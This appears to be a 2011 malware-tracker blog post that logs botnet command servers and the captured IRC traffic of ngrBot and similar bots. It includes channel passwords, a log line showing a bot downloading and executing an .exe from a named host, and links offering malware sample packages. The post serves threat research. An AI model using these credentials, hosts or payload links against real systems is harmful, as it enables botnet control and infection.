Month: April 2011

up.scorevidic.net (botnet hosted in United States Baltimore Gandi Us Inc)

* Dns resolving up.scorevidic.net
* Dns resolved up.scorevidic.net to 173.246.103.19
* Dns resolving av.psybnc.cz
* Dns resolved av.psybnc.cz to 173.246.103.19
* Dns resolving av.shannen.cc
* Dns resolved av.shannen.cc to 173.246.103.19

173.246.103.19 3211
173.246.103.19 4949
173.246.103.19 5900

Remote Host Port Number
173.246.103.19 4949 PASS ngrBot
194.28.44.217 80
213.251.170.52 80
216.45.58.150 80

70mb malware samples

This is a big package of different malware, such as banking trojans, IRC bots and trojan downloaders, in different languages. Download: http://a5181c44.tinylinks.co

208.98.40.230 (botnet hosted in United States Missoula Sharktech Internet Services)

Remote Host Port Number
208.98.40.230 3211

PASS google_cache2.tmp
NICK n[DvLz-USA|XP]294793
USER 1810 “” “TsGh” :1810
PONG :9FCB5175
JOIN #DvLz DvLz#
PONG :Irc.D3v1Lz.Com

* Now talking in #DvLz
* Topic is ‘!Msn http://www.youtubes.ca/watch.php?v=OnLhzs7d0E8 ‘
* Set by Sh on Wed Apr 13 20:50:32

Info about hosting: http://whois.domaintools.com/208.98.40.230

KGootkit (malware hosted in Latvia Users)

Some features:

Start/Install Windows service: This executable starts a Windows service. Services have the highest level of privilege in Windows, and are thus useful for a number of malicious purposes.

Load driver: This executable loads a driver into the Windows kernel. Device drivers are used by advanced malware (rootkits) to operate stealthily and escape detection.

67.159.63.23 (botnet hosted in United States Woodstock Fdcservers.net)

Remote Host Port Number
67.159.63.23 6464

NICK {XPUSA900275}
PONG z3k4nt.audigier.Mx
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA900275} -ix
JOIN #z3k4nt2
MODE #z3k4nt2 -ix

UPDATE:
NICK {XPUSA830783}
PONG z3k4nt.audigier.Mx
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA830783} -ix
JOIN #z3k4nt3
MODE #z3k4nt3 -ix

Info about hosting: http://whois.domaintools.com/67.159.63.23

matea.dukatlgg.com (botnet hosted in United States Staminus Communications)

* Dns resolving haso.dukatlgg.com
* Dns resolved haso.dukatlgg.com to 72.20.30.119
* Dns resolving matea.dukatlgg.com
* Dns resolved matea.dukatlgg.com to 72.20.30.119
Dns resolved haso.dukatlgg.com to 67.159.63.63

Remote Host Port Number
213.251.170.52 80
70.38.98.234 80
70.38.98.237 80
70.38.98.238 80
72.20.30.119 8888

PASS ngrBot
PRIVMSG #msn :[MSN]: Updated MSN spread message to “hahah.. your photo?

40mb malware samples

This is another package of different malware, mostly IRC bots, banking trojans, etc. Download: http://0cc80bc0.goneviral.com

77.79.4.159 (ngrbot hosted in Lithuania Webhosting Collocation Services)

Remote Host Port Number
213.251.170.52 80
64.62.181.43 80
77.79.4.159 1866

PASS ngrBot or PASS xxx
NICK n{US|XPa}mhewugg
USER mhewugg 0 0 :mhewugg
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3”
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4”
PRIVMSG #!hot! :[d=”http://64.62.181.43/dalnets/gaylord.exe” s=”94720 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp”